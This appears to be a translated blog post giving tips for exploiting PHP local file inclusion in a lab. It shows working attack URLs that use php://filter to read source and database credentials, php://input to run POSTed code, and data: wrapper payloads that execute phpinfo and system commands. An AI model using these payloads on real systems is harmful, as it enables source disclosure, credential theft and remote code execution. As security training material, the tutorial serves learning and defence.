LFI: Other Tips

Recently, during an intensive DEFCON-style training session, a set of challenges came up that were covered in a writeup by a foreign author.
For more information, see http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/.
PS: This technique is not new. It has surely been used so much that it has become boring, so if you already know it, feel free to pass by ~
I am waiting for others to add to my knowledge ~ (squatting in the corner ~)
Consider the following scenario:
(1) http://vulnerable/fileincl/example1.php?page=intro.php (this PHP file contains the LFI vulnerability)
(2) but you have nowhere to upload your webshell code
(3) LFI can only read the source of non-PHP files (a PHP file is parsed and executed rather than displayed, so its contents can only be guessed at)
(4) If you could read a file such as config.php, you could obtain the database account directly for a remote intrusion.
[Now the question is] How can LFI read the source code of a PHP file?
Let me demonstrate. If I use LFI in the normal way to read /sqli/db.php, I cannot see its source code; the file is executed as PHP instead:
http://vulnerable/fileincl/example1.php?page=../sqli/db.php
However, using the method described in the foreign author's article, we can have the file displayed Base64-encoded via the php://filter wrapper:
http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php
The Base64-encoded source of /sqli/db.php is displayed as follows:
Then Base64-decode it, and the source code of /sqli/db.php is visible at a glance.
It looks amazing... but =_=| ~ keep reading ~
******************** I am an evil dividing line ********************
Picked up a few new tips thanks to @oxBs.
[Tip] php://input and data:
For details on php://input, refer to
http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html
[Condition] allow_url_include = On and PHP >= 5.2.0
[Advantage] POST the PHP code directly and have it executed
[Drawback] With allow_url_include = On you can normally just do RFI directly anyway; this is simply more convenient for folks without a VPS.
We exploit the same LFI vulnerability again:
http://vulnerable/fileincl/example1.php?page=intro.php
Request the following URL and use Burp to modify the HTTP request directly, appending the PHP code to the request body:
http://vulnerable/fileincl/example1.php?page=php://input
And once again some poor fellow gets owned >_< !~ (Sorry ~)
Next, switching to the data: wrapper:
http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=
http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk7Lyo=
http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>
Use your imagination for the rest ~
Due to time constraints, I have not yet had time to study its underlying principles further.
In the spirit of hacking, I recommend you study it in depth >_< !~